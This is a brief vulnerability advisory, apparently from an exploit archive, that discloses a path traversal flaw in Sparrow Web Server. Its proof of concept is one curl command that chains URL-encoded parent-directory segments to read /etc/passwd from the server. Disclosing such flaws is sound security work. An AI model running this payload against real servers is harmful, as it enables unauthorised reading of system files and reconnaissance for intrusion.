Sparrow Web Server Directory Traversal

Sparrow Web Server suffers from a directory traversal vulnerability.

MD5 | d1783f0002f84e97b130c4c5da1a1fac

Download

# Title: Sparrow Web Server - Path Traversal
# Author: Nassim Asrir
# Contact: [email protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/
# Researcher At: Henceforth
# CVE: N/A

# Vendor #:

https://github.com/codercheng/sparrow

# Download #:

https://github.com/codercheng/sparrow

# Vulnerability Type#:

Path Traversal

# Exploit type #

Local - Remote

# POC #:

To exploit this vulnerability use Curl libray:

$ curl http://server-ip/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

Source: packetstormsecurity.com